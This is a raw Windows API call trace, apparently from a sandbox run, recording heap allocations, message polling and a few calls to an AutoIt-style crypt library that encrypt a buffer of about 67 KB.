[0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.828] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.829] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0042.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0042.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0042.832] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.832] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.832] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.832] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.833] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.833] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.833] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.833] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.833] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.833] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.833] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.833] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.833] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.833] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.834] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.834] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.834] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.834] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.834] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.834] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x10898, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x108a0) returned 1 [0042.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.835] CharLowerBuffW (in: lpsz="byte[67745]", cchLength=0xb | out: lpsz="byte[67745]") returned 0xb [0042.835] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.836] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.836] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.836] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9458a8*, pdwDataLen=0x6ae220*=0x10898, dwBufLen=0x108a0 | out: pbData=0x9458a8*, pdwDataLen=0x6ae220*=0x108a0) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.837] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.837] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.838] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.838] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.842] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.842] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 